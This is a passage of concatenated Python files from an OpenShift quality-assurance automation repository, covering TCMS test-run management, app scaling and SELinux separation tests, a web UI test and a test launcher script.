plain_id='4962'):\n filter['is_automated'] = 1\n filter['plan__plan_id'] = plain_id\n filter['case_status'] = 2 #2-#CONFIRMED\n\n testcases = self.server.TestCase.filter(filter)\n if len(testcases) == 0 :\n raise TCMSException(\"ERROR[TCMS] : No test cases to run with filter %s\" % str(filter))\n return testcases\n\n def get_tag_id(self, tag_name):\n if isinstance(tag_name, str):\n try:\n return int(self.server.Tag.get_tags({'names':[tag_name]})[0]['id'])\n except Exception as e:\n self.log.error(str(e))\n return None\n elif isinstance(tag_name, list) or isinstance(tag_name, tuple):\n try:\n return map(lambda x: x['id'], self.server.Tag.get_tags({'names':tag_name}))\n except Exception as e:\n self.log.error(str(e))\n return None\n else:\n return None\n\n def get_testcase_id_list_by_tag(self, testcase_tag_list, plan_id=4962):\n self.log.debug(\"Geting test cases taged by %s\" %(testcase_tag_list))\n try:\n tag_id_list = [ i['id'] for i in self.server.Tag.get_tags({'names': testcase_tag_list}) ]\n \"\"\"\n tag_id_list = []\n # TCMS bug - 808691, so here I must use hard code - tag_id_name_map:.\n for i in testcase_tag_list:\n for j in tag_id_name_map:\n if i == j[\"name\"]:\n tag_id_list.append(j[\"id\"])\n break\n \"\"\"\n filter = {\n 'plan': plan_id,\n 'tag__in': tag_id_list}\n #print filter\n tc_list = self.get_testcases(filter)\n tc_id_list = []\n for tc in tc_list:\n tc_id_list.append(tc[\"case_id\"])\n return tc_id_list\n except Exception as e:\n self.log.error(e)\n\n def add_testcase_to_run_by_tag(self, testcase_tag_list, testrun_id):\n self.log.debug(\"Adding test cases taged by %s to test run %s\" %(testcase_tag_list, testrun_id))\n try:\n tc_id_list = get_testcase_id_list_by_tag(testcase_tag_list)\n self.add_testcase_to_run(tc_id_list, testrun_id)\n except Exception as e:\n self.log.error(e)\n\n def update_testrun(self, testrun_id, filter):\n return self.server.TestRun.update([testrun_id], filter)\n\n\n\nclass TCMSException(Exception):\n def __init__(self, msg):\n self.msg = msg\n def __str__(self):\n return repr(self.msg)\n\n\n\n\nif __name__ == \"__main__\":\n pass\n" }, { "alpha_fraction": 0.5856850743293762, "alphanum_fraction": 0.5938650369644165, "avg_line_length": 34.780487060546875, "blob_id": "5023e206c68fcea3f703814150a3ca6064f2f4dc", "content_id": "ee41e64996a68d4790c029c2d4f4acf2fa263fbb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7335, "license_type": "no_license", "max_line_length": 225, "num_lines": 205, "path": "/automation/open/testmodules/RT/scaling/jbossas_mysql_scaling.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nimport testcase, common, OSConf\nimport rhtest\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.user_email = self.config.OPENSHIFT_user_email\n self.user_passwd = self.config.OPENSHIFT_user_passwd\n self.app_name = 'jboss' + common.getRandomString()\n try:\n self.app_type = common.app_types[self.get_variant()]\n except:\n self.app_type = common.app_types[\"jbossas\"]\n\n common.env_setup()\n self.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass JbossasMysqlScaling(OpenShiftTest):\n def check_mysql_result(self):\n app_url = OSConf.get_app_url(self.app_name)\n return common.grep_web_page(\"http://%s/mysql_scalable.jsp\" % app_url, \"Tim Bunce, Advanced Perl DBI\", \"-H 'Pragma: no-cache'\", delay=10, count=12)\n\n def prepare_jsp_file(self):\n try:\n fr = open(\"%s/cartridge/app_template/mysql/mysql_scalable.jsp\"%(WORK_DIR + \"/../\"), \"r\")\n except Exception as e:\n print str(e)\n return False\n jsp = fr.read()\n fr.close()\n try:\n fw = open(\"%s/src/main/webapp/mysql_scalable.jsp\" %self.app_name, \"w\")\n fw.write(jsp)\n fw.close()\n except Exception as e:\n self.error(str(e))\n return False\n\n try:\n fw = open(\"%s/pom.xml\"%self.app_name, \"w\")\n self.info(\"Generate a pom.xml file\")\n fw.write(\"\"\"<project xmlns=\"http://maven.apache.org/POM/4.0.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd\">\n <modelVersion>4.0.0</modelVersion>\n <groupId>%s</groupId>\n <artifactId>%s</artifactId>\n <packaging>war</packaging>\n <version>1.0</version>\n <name>%s</name>\n <licenses>\n <license>\n <name>Apache License, Version 2.0</name>\n <url>http://www.apache.org/licenses/LICENSE-2.0.html</url>\n </license>\n </licenses>\n <properties>\n <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>\n </properties>\n <dependencies>\n <dependency>\n <groupId>org.jboss.spec</groupId>\n <artifactId>jboss-javaee-6.0</artifactId>\n <version>1.0.0.Final</version>\n <type>pom</type>\n <scope>provided</scope>\n </dependency>\n <dependency>\n <groupId>mysql</groupId>\n <artifactId>mysql-connector-java</artifactId>\n <version>5.1.20</version>\n </dependency>\n </dependencies>\n <profiles>\n <profile>\n <!-- When built in OpenShift the 'openshift' profile will be used when invoking mvn. -->\n <!-- Use this profile for any OpenShift specific customization your app will need. -->\n <!-- By default that is to put the resulting archive into the 'deployments' folder. -->\n <!-- http://maven.apache.org/guides/mini/guide-building-for-different-environments.html -->\n <id>openshift</id>\n <build>\n <finalName>%s</finalName>\n <plugins>\n <plugin>\n <artifactId>maven-war-plugin</artifactId>\n <version>2.1.1</version>\n <configuration>\n <outputDirectory>deployments</outputDirectory>\n <warName>ROOT</warName>\n </configuration>\n </plugin>\n </plugins>\n </build>\n </profile>\n </profiles>\n</project>\"\"\" % (self.app_name, self.app_name, self.app_name, self.app_name))\n fw.close()\n except Exception as e:\n self.error(str(e))\n return False\n\n return True\n\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n \"Create a scalable %s app: %s\" % (self.app_type, self.app_name),\n common.create_scalable_app,\n function_parameters = [self.app_name, self.app_type, self.user_email, self.user_passwd, True, \"./\" + self.app_name],\n expect_description = \"App should be created successfully\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"embed mysql to %s\" % self.app_name,\n common.embed,\n function_parameters = [ self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.user_email, self.user_passwd ],\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Prepare template files\",\n self.prepare_jsp_file,\n expect_return = True))\n\n# step = testcase.TestCaseStep(\n# \"update config file\",\n# \"sed -i '/MysqlDS\\\"/ {s/false/true/}' %s/.openshift/config/standalone.xml\" % (self.app_name),\n# expect_return = 0)\n# steps.append(step)\n\n self.steps_list.append(testcase.TestCaseStep(\n \"git push codes\",\n \"cd %s && git add . && git commit -am 'update app' && git push\" % self.app_name,\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Check MySql Result\",\n self.check_mysql_result,\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Scale-up the application via Rest API\",\n common.scale_up,\n function_parameters = [self.app_name,],\n expect_description = \"Operation must be successfull\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Check MySql Result - again\",\n self.check_mysql_result,\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Scale-donw the application via Rest API\",\n common.scale_down,\n function_parameters = [self.app_name,],\n expect_description = \"Operation must be successfull\",\n expect_return = 0,\n try_interval=5,\n try_count=6))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Check MySql Result - again\",\n self.check_mysql_result,\n expect_description = \"MySQL operation must be successfull\",\n expect_return = 0))\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Remove mysql from %s\" % self.app_name,\n common.embed,\n function_parameters = [ self.app_name, \"remove-\" + common.cartridge_types[\"mysql\"] ],\n expect_description = \"Operation must be successfull\",\n expect_return = 0))\n\n case = testcase.TestCase(\"[US2099][US2307][RT][rhc-cartridge]Embed mysql to scalable apps: jbossas, jbosseap\", self.steps_list)\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(JbossasMysqlScaling)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.6197420358657837, "alphanum_fraction": 0.6270331144332886, "avg_line_length": 27.285715103149414, "blob_id": "e371a01cb6bcf837005f3e36297204ece387b092", "content_id": "718e211dac070bc30e7be135872bb2aff7e48430", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1783, "license_type": "no_license", "max_line_length": 126, "num_lines": 63, "path": "/automation/open/testmodules/RT/security/selinux_illegal_operations.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nLinqing Lu\[email protected]\nDec 23, 2011\n\n\"\"\"\n\nimport os, sys\n\nimport testcase\nimport common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.mypath = os.path.abspath(__file__)\n self.mydir = os.path.dirname(__file__)\n self.summary=\"[integration][rhc-selinux]SELinux separation - illegal operations\"\n common.env_setup()\n self.app_name = 'python'\n self.app_type = common.app_types[self.app_name]\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n \n\nclass SelinuxIllegalOperations(OpenShiftTest):\n def test_method(self):\n #\"Create an %s app: %s\" % (self.app_type, self.app_name),\n ret = common.create_app(self.app_name, self.app_type)\n self.assert_equal(ret, 0, \"App should be created successfully\")\n\n #\"Copy template files\",\n ret = common.command_get_status(\"cp -f %s/data/illegal_app_content/* %s/wsgi/\" % (self.mydir, self.app_name))\n self.assert_equal(ret, 0)\n\n #\"Git push codes\",\n ret = common.command_get_status(\"cd %s/wsgi/ && git add . && git commit -am 'update app' && git push\" % self.app_name)\n self.assert_equal(ret, 0)\n\n #\"Get app URL\",\n app_url = common.get_app_url_from_user_info(self.app_name)\n\n #\"Check feedback\",\n ret = common.grep_web_page(app_url, 'RETURN VALUE:0')\n self.assert_equal(ret, 1) #the string shouldn't be there\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SelinuxIllegalOperations)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5761477947235107, "alphanum_fraction": 0.6108622550964355, "avg_line_length": 23.12162208557129, "blob_id": "d4371b8baa69394b37f4cc0394295f40112efa68", "content_id": "a3ba3b051456514b0aa8058b6af1c60d518cf5cd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1786, "license_type": "no_license", "max_line_length": 124, "num_lines": 74, "path": "/automation/open/testmodules/UI/web/case_174262.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_174262.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass CreateRuby1_9App(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n\n web.login()\n #web.delete_app(\"ruby19\")\n #create a ruby1.9 app\n web.create_app(\"ruby-1.9\",\"ruby19\")\n\n #check wether the links are correct\n time.sleep(5)\n \n #check the \"appurl\" link\n web.go_to_app_detail(\"ruby19\")\n web.click_element_by_xpath('''//div[@id='content']/div/div/div/div[2]/nav/div/a''')\n time.sleep(2)\n web.assert_text_equal_by_xpath(\"Welcome to OpenShift\",'''//title''') \n \n #delete a ruby19 app\n web.go_to_app_detail(\"ruby19\")\n time.sleep(2)\n web.click_element_by_link_text(\"Delete this application\")\n time.sleep(1)\n web.click_element_by_name(\"commit\")\n time.sleep(60)\n web.go_to_app_detail(\"ruby19\")\n web.assert_text_equal_by_xpath(\"Sorry, but the page you were trying to view does not exist.\", '''//article/div/p''')\n\n\n self.tearDown()\n\n return self.passed(\" case_174262--CreateRuby1_9App passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateRuby1_9App)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_174262.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6524926424026489, "alphanum_fraction": 0.6539589166641235, "avg_line_length": 33.099998474121094, "blob_id": "2d7882b4fe8c508e8a6264fe2c1a98a16edf7255", "content_id": "a939b8cc2c19c70181573fda4cb2bb795faf50bd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1364, "license_type": "no_license", "max_line_length": 149, "num_lines": 40, "path": "/automation/open/bin/update_rhc_client.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n#\n# Helper script for updating RHC clients based on OS\n#\n# [email protected]\n#\nimport os\nimport sys\nimport fcntl\nimport setup_client\nfrom optparse import OptionParser\n\n\nif __name__ == \"__main__\":\n parser = OptionParser()\n parser.set_defaults(skip_create_repo=False)\n parser.add_option(\"-b\", \"--branch\", dest=\"branch\", help=\"What branch to use for installation. Options: [stage|candidate].\")\n parser.add_option(\"-r\", \"--release\", dest=\"release\", help=\"What release of rhc client should be used to install. Default is the latest release.\")\n parser.add_option(\"-k\", action=\"store_true\", dest=\"skip_create_repo\", help=\"If skip creating yum repo. Default is False\")\n (options, args) = parser.parse_args()\n\n if not options.branch:\n options.branch = 'candidate'\n\n if os.getuid() == 0:\n need_sudo = \"\"\n else:\n need_sudo = \"sudo\"\n os.system('%s touch /tmp/update_client.lock' % (need_sudo))\n lock_file = file(\"/tmp/update_client.lock\", \"r\")\n try:\n fcntl.flock(lock_file, fcntl.LOCK_EX)\n except IOError, e:\n fcntl.flock(lock_file, fcntl.LOCK_UN)\n print \"Failed to get update client lock\"\n sys.exit(1)\n ret = setup_client.do_setup(options.release, options.branch, options.skip_create_repo)\n fcntl.flock(lock_file, fcntl.LOCK_UN)\n lock_file.close()\n sys.exit(ret)\n" }, { "alpha_fraction": 0.565645694732666, "alphanum_fraction": 0.5718206167221069, "avg_line_length": 43.35869598388672, "blob_id": "e142e063412d195b440664a3af6063b33a2cbacb", "content_id": "ce38a8dc93ff76c618ea9be04a2737d170712688", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20405, "license_type": "no_license", "max_line_length": 263, "num_lines": 460, "path": "/automation/open/bin/launcher.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\nimport os\nimport sys\nimport time\nimport platform\nimport socket\nimport shutil\nfile_path = os.path.dirname(os.path.realpath(__file__))\nlib_path = os.path.abspath(file_path + \"/../lib\")\ntestmodules_path = os.path.abspath(file_path + \"/../testmodules\")\nsys.path.append(lib_path)\nsys.path.append(lib_path + \"/supports\")\nsys.path.append(testmodules_path)\nfrom tcms import TCMS, TCMSException\nfrom helper import *\nimport clog\nimport random\nimport database\nimport json\nimport OSConf\n\ntcmsobj = None\nDEBUG = True \nFROM_DB = False\nRUNDIR = \"%s/../workspace\"%file_path\n(OshiftUser, OshiftPasswd) = get_default_rhlogin()\n\ndef run_tests(testrun_id, tc_id_list=None, skip_tag_ids=None):\n final_testrun_cases = []\n if not FROM_DB:\n testrun_cases = tcmsobj.get_testcase_by_run_id(testrun_id)\n\n #get all testcaseruns for save time\n log.debug(\"Getting all case runs...\")\n testcaserun_hash = dict()\n for caserun in tcmsobj.server.TestRun.get_test_case_runs(testrun_id):\n testcaserun_hash[caserun['case_id']] = caserun\n log.debug(\"Filtering Test Case ...\")\n for i in testrun_cases:\n #case_run = tcmsobj.get_testcaserun(i['case_id'], testrun_id)\n if testcaserun_hash.has_key(i['case_id']):\n i['case_run_id'] = testcaserun_hash[i['case_id']]['case_run_id']\n i['case_run_status'] = testcaserun_hash[i['case_id']]['case_run_status']\n else:\n log.warning(\"SKIP: Unable to find case_run for case[%s]\"%i['case_id'])\n continue\n\n if i['case_status'] != 'CONFIRMED' or int(i['is_automated']) != 1 or i['case_run_status'] != 'IDLE': \n log.info(\"SKIP: Case %s in this run is not CONFIRMED, or AUTOMATED, or its status is not IDLE\" %(i['case_id']))\n else:\n if tc_id_list != None and i['case_id'] not in tc_id_list:\n log.info(\"SKIP: Case %s in not in your specified list - %s\" %(i['case_id'], tc_id_list))\n else:\n final_testrun_cases.append(i)\n\n if len(final_testrun_cases) == 0:\n log.info(\"No suitable test for testing!\")\n return 0\n manual_run_tag_id = tcmsobj.get_tag_id('manual_run')\n else:\n ### HERE if we are using MySQL to get the testcases\n final_testrun_cases = []\n for tc_id in tc_id_list:\n testcase = database.get_testcase_by_id(tc_id)\n final_testrun_cases.append(testcase)\n # XXX put back in later\n debug(\"=\" * 80)\n # First of all, will run 142463 case\n log.info(\"Job starts - Creating domain\")\n debug(\"=\" * 80)\n ret = exec_testmodule(\"RT.job_related.create_domain\", rhtest_args=' -R -G ')\n if (ret != 0):\n log.error(\"Unable to create a domain - HALT.\")\n sys.exit(254)\n #do random shuffle sort to avoid parallel conflicts\n random.shuffle(final_testrun_cases)\n if not FROM_DB:\n for tc in final_testrun_cases:\n debug(\"\\n\\n\")\n debug(\"-\" * 80)\n log.info(\"Running case#%s [%s...]\" %(tc['case_id'], tc['summary'][:40]))\n debug(\"-\" * 80)\n try:\n json_data = json.loads(tc['script'])\n script = json_data['python'].strip().split(\".py\")[0]\n except:\n print \"Can't find script...trying again with .py format\"\n script = tc['script'].strip().split(\".py\")[0]\n\n cf_path = \"%s/%s.%s\" %(testmodules_path, script + \".conf\", OshiftUser)\n module_name = \".\".join(script.split(\"/\"))\n if len(script.strip()) == 0 or len(module_name) == 0:\n log.info(\"WARNING: Undefined script in TCMS\")\n continue\n if tc['arguments'] == '':\n tc['arguments'] = None\n\n content = \"\"\"\ntcms_arguments = %s\nscript = '%s'\ntcms_testcase_id = %s\ntcms_testrun_id = %s\ntcms_testcaserun_id = %s\ntcms_testrun_environment = '%s' \n\"\"\" %(tc['arguments'], tc['script'], tc['case_id'], testrun_id, tc['case_run_id'], '___TBD___')\n # Before running, check status again, set it for RUNNING status, also for parallel funcationaliy\n case_run = tcmsobj.get_testcaserun_by_id(tc['case_run_id'])\n if case_run['case_run_status'] == 'IDLE':\n #if a job needs to be run manually, because of e.g. long execution \n #time or requires some user interaction, we will mark this case as \n #PAUSED and it will be up to user to accomplish such task\n #https://hosted.englab.nay.redhat.com/issues/10569\n if manual_run_tag_id in tc['tag']:\n tcmsobj.update_testcaserun_status(tc['case_run_id'], 'PAUSED')\n continue\n to_skip = False\n for stag in skip_tag_ids:\n if stag in tc['tag']:\n to_skip = True\n break\n if to_skip:\n #tcmsobj.update_testcaserun_comments(tc['case_run_id'], 'SKIPPED/IGNORED by launcher.py --skip_tags ... or has \"need_update_auto\" tag')\n tcmsobj.update_testcaserun_status(tc['case_run_id'], 'WAIVED')\n continue\n\n tcmsobj.update_testcaserun_status(tc['case_run_id'], 'RUNNING')\n write_file(cf_path, content)\n exec_testmodule(module_name, tc, testrun_id)\n else:\n log.debug(\"Testcaserun - %s status is not IDLE now, skip it.\" %(tc['case_run_id']))\n else:\n ## user running w/o TCMS should always be creating new entry into DB and not reuse\n for tc in final_testrun_cases:\n debug(\"\\n\\n\")\n debug(\"-\" * 80)\n log.info(\"Running case#%s [%s...]\" %(tc['case_id'], tc['summary'][:40]))\n debug(\"-\" * 80)\n try:\n json_data = json.loads(tc['script'])\n script = json_data['python'].strip().split(\".py\")[0]\n except:\n print \"Can't find script...trying again with .py format\"\n script = tc['script'].strip().split(\".py\")[0]\n\n cf_path = \"%s/%s.%s\" %(testmodules_path, script + \".conf\", OshiftUser)\n module_name = \".\".join(script.split(\"/\"))\n if len(script.strip()) == 0 or len(module_name) == 0:\n log.info(\"WARNING: Undefined script in TCMS\")\n continue\n if tc['arguments'] == '':\n tc['arguments'] = None\n\n content = \"\"\"\ntcms_arguments = %s\nscript = '%s'\nmysql_db_testrun_id = '%s'\ntcms_testcase_id = %s\ntcms_testrun_environment = '%s' \n\"\"\" %(tc['arguments'], tc['script'], testrun_id, tc['case_id'], '___TBD___')\n # udpate testcase_run table\n caserun_res = database.update_testcaserun_status(testrun_id, tc['case_id'], 'RUNNING')\n write_file(cf_path, content)\n exec_testmodule(module_name, testrun_id)\n test_res = database.get_latest_test_result()\n if test_res.PassFail =='P':\n caserun_res = database.update_testcaserun_status(testrun_id, tc['case_id'], 'PASSED')\n elif test_res.PassFail =='F':\n caserun_res = database.update_testcaserun_status(testrun_id, tc['case_id'], 'FAILED')\n #caserun_res.status = test_case_status \n print caserun_res[0]\n \n # XXX put this back later. \n # In the end, will run 146352\n debug(\"=\" * 80)\n log.debug(\"Job ends - Cleaning domain and app\")\n debug(\"=\" * 80)\n exec_testmodule(\"RT.job_related.apps_clean_up\", rhtest_args=' -R -G ')\n if not FROM_DB:\n # Update the test run status to FINISHED \n tcmsobj.update_testrun(testrun_id, {'status' : 1})\n else:\n # udpate the mysqld db for the testrun_tag\n database.update_testrun(testrun_id, {'status' :1})\n\n\ndef exec_testmodule(testname, tc_obj=None, testrun_id=None, rhtest_args=''):\n if tc_obj:\n tcms_run_details = \"\"\n case_run_id = tc_obj['case_run_id']\n case_id = tc_obj['case_id']\n tcms_run_details = \",\".join([str(testrun_id), str(case_run_id), str(case_id)])\n else:\n case_run_id = None\n tcms_run_details = None\n\n instance_ip = get_instance_ip()\n log_file = \"%s/curr_tc_log.%s\"%(get_tmp_dir(), case_run_id)\n if os.getenv('RHTEST_ARGS'):\n rhtest_args += \" \"+os.getenv('RHTEST_ARGS')+\" \"\n if DEBUG:\n rhtest_args += \" -d \"\n shell_options=\"\"\n if os.getenv(\"SHELL\") == \"/bin/bash\":\n if platform.dist()[0] == 'Ubuntu':\n shell_options = \" bash -c 'set -o pipefail';\"\n else:\n shell_options = \" set -o pipefail;\"\n else:\n log.warning(\"Non BASH shell(%s). If possible use /bin/bash instead.\"%os.getenv(\"SHELL\"))\n prev_dir = os.getcwd()\n os.chdir(RUNDIR)\n cmd = \"%s %s/rhtest -i %s -x %s %s %s 2>&1 | tee %s 2>&1;\"%(shell_options,\n file_path, \n instance_ip,\n tcms_run_details,\n rhtest_args,\n testname,\n log_file)\n log.debug(cmd)\n print \"CMD: %s\" % cmd\n try:\n ret = os.system(cmd)\n finally:\n os.chdir(prev_dir)\n #this is strange (probably because of pipefail)\n if (ret>255):\n ret = ret/256\n\n return ret\n\n\ndef create_test_run(testrun_tag, tc_id_list, testplan_id):\n \"\"\"\n Create TCMS.TestRun according to tc_id_list.\n \"\"\"\n timestamp = time.strftime(\"%Y_%m_%d-%H:%M:%S\", time.localtime())\n test_run_summary = \"%s [%s]\" %(testrun_tag, timestamp)\n testrun_id = tcmsobj.create_testrun(test_run_summary, plan_id=testplan_id)['run_id']\n # create_domain - 142463; clean_up - 146352\n # This two cases must be added into new test run as the first one, and the last one.\n #update_test_run(testrun_id, [142463])\n update_test_run(testrun_id, tc_id_list) \n #update_test_run(testrun_id, [146352])\n return testrun_id\n \n\ndef update_test_run(testrun_id, tc_id_list):\n \"\"\"\n Update TCMS.TestRun according to tc_id_list.\n \"\"\"\n if tc_id_list != None and isinstance(tc_id_list, list) and len(tc_id_list) != 0:\n tcmsobj.add_testcase_to_run(tc_id_list, testrun_id)\n return True\n else:\n print \"only support list format for test cases\"\n return False\n \ndef parse_cmdline():\n usage = \"\"\"\nusage: %s {Instance Arguments} {TCMS Arguments}\nInstance Arguments: (-a ec2-xxx.compute-1.amazonaws.com) | ([-m devenv_xxx] [-n QE_devenv_xxx] [-z xxx])\nTCMS Arguments: (-t xxx (-c 'n, ..., m')|(-g 'xxx, ..., zzz') [-p xxx]) | (-i xxx [(-c 'n, ..., m')|(-g 'xxx, ..., zzz') -p xxx])\n\"\"\" %(os.path.basename(__file__))\n\n from optparse import OptionParser\n parser = OptionParser(usage=usage)\n parser.set_defaults(FROM_DB=False)\n parser.add_option(\"-d\", \"--debug\", dest=\"DEBUG\", action='store_true', help=\"Enable debug information\")\n parser.add_option(\"-m\", \"--ami\", dest=\"ami\", help=\"Instance Arguments: Launch openshift instance from this ami.\")\n parser.add_option(\"-n\", \"--instance_tag\", dest=\"instance_tag\", help=\"Instance Arguments: Instance tag for the newly launched instance\")\n parser.add_option(\"-a\", \"--instance_ip\", dest=\"instance_ip\", help=\"Instance Arguments: Using this exsiting openshift instance for testing\")\n parser.add_option(\"-A\", \"--instance_ip_by_tag\", dest=\"instance_ip_by_tag\", help=\"Instance Arguments: Using this existing openshift instance for testing defined by tag.\")\n parser.add_option(\"-z\", \"--image_size\", dest=\"image_size\", default='m1.medium', help=\"Instance Arguments: Specify size for launching instance. By default it is m1.medium\")\n parser.add_option(\"-t\", \"--testrun_tag\", dest=\"testrun_tag\", help=\"TCMS Arguments: Create new test run with this tag\")\n parser.add_option(\"-i\", \"--testrun_id\", dest=\"testrun_id\", type=int, help=\"TCMS Arguments: Using this existing test run that you want to run.\")\n parser.add_option(\"-c\", \"--testcase_ids\", dest=\"testcase_ids\", help=\"TCMS Arguments: A list of test case ids that you want to execute\")\n parser.add_option(\"-g\", \"--testcase_tags\", dest=\"testcase_tags\", help=\"TCMS Arguments: A list of test case tags that you want to execute\")\n parser.add_option(\"-p\", \"--testplan_id\", dest=\"testplan_id\", default=4962, type=int, help=\"TCMS Arguments: All test cases are selected from this test plan for creating/updating test run. By default it is 4962 - https://tcms.engineering.redhat.com/plan/4962/\")\n parser.add_option(\"-s\", \"--skip_tags\", dest=\"skip_tags\", help=\"TCMS Arguments: A list of test case tags that you want to skip\")\n parser.add_option(\"-r\", \"--client_version\", dest=\"client_version\", help=\"Arguments: version number of rhc client to use. If not defined, it will be used the last one\")\n parser.add_option(\"-D\", action=\"store_true\", dest=\"FROM_DB\", help=\"retrieve the testcase and tag information from MySQL database\")\n\n return parser.parse_args()\n\n\ndef main():\n global tcmsobj\n global DEBUG\n\n (options, args) = parse_cmdline()\n\n try:\n os.makedirs(get_tmp_dir())\n #TODO: what about remove whole TMP_DIR?\n # it seems to be safe if it is within $HOME/tmp/\n except:\n pass\n \n shutil.rmtree(RUNDIR, True)\n os.makedirs(RUNDIR)\n try:\n # Remove OSConf cache\n os.remove(OSConf.get_cache_file())\n os.remove(\"%s/libra_server-%s\"%(get_tmp_dir(), OshiftUser))\n except:\n pass\n '''\n if options.client_version:\n log.info(\"Setup rhc client to version: %s\"%options.client_version)\n try:\n r = setup_rhc_client(options.client_version)\n #r = update_rhc_client(options.client_version)\n if r != 0:\n raise Exception(\"\")\n except:\n log.error(\"Unable to setup RHC client to given version!\")\n sys.exit(254)\n '''\n DEBUG = options.DEBUG\n if DEBUG:\n os.environ['RHTEST_DEBUG'] = '1'\n # Priority for Instance Arguments: -a -> -m\n if options.instance_ip != None:\n # This branch is when you want to use existing instance\n instance_ip = options.instance_ip\n elif options.instance_ip_by_tag is not None:\n # This branch is when you want to use previously \n # launched/stopped instance\n try:\n if not options.instance_ip_by_tag.startswith('QE_'):\n log.warning(\"Appending QE_ prefix for given instance tag!\")\n options.instance_ip_by_tag = 'QE_'+options.instance_ip_by_tag\n instance_ip = get_instance_ip_by_tag(options.instance_ip_by_tag)\n log.info(\"Found instance[%s] IP=%s\"%(options.instance_ip_by_tag, instance_ip))\n except Exception as e:\n log.warning(\"Unable to get IP address from instance by tag: %s. (%s)\"%\n (options.instance_ip_by_tag, str(e)))\n log.warning(\"Instance doesn't exist!\")\n log.warning(\"Therefoer a new instance is going to be launched.\")\n try:\n instance_ip = create_node(options.instance_ip_by_tag, options.ami, options.image_size)\n except Exception as e:\n log.error(\"Unable to launch new instance with tag:%s. (%s)\"%\n (options.instance_ip_by_tag, str(e)))\n sys.exit(254)\n else:\n # This is when you want to launch new instance\n instance_ip = create_node(options.instance_tag, options.ami, options.image_size)\n\n testplan_id = options.testplan_id\n os.environ['OPENSHIFT_libra_server'] = instance_ip\n \n set_libra_server(instance_ip)\n #log.info(\"Platform: %s\"%\" \".join(platform.uname()))\n #log.info(cmd_get_status_output(\"rhc --version; python --version; ruby --version\", quiet=True)[1])\n #log.info(aws_console.get_ami(get_instance_ip()))\n #try:\n # log.info(\"Host: %s\"%socket.gethostbyname(socket.gethostname()))\n #except:\n # log.info(\"Host: %s\"%socket.gethostname())\n #Do TCMS authentication only once\n\n tc_id_list = []\n tc_tag_list = []\n skip_tag_ids = []\n\n if not options.FROM_DB:\n tcmsobj = TCMS()\n else:\n global FROM_DB\n FROM_DB = options.FROM_DB\n\n if options.testcase_ids != None:\n tmp_list = options.testcase_ids.split(',')\n for i in tmp_list:\n tc_id_list.append(int(i.strip()))\n elif options.testcase_tags != None:\n tmp_list = options.testcase_tags.split(',')\n for i in tmp_list:\n tc_tag_list.append(i.strip())\n #print \"--->\", tc_tag_list\n\n # remove need_update_auto tag\n if options.skip_tags:\n options.skip_tags = \"xxx,%s\"%(options.skip_tags)\n else:\n options.skip_tags = 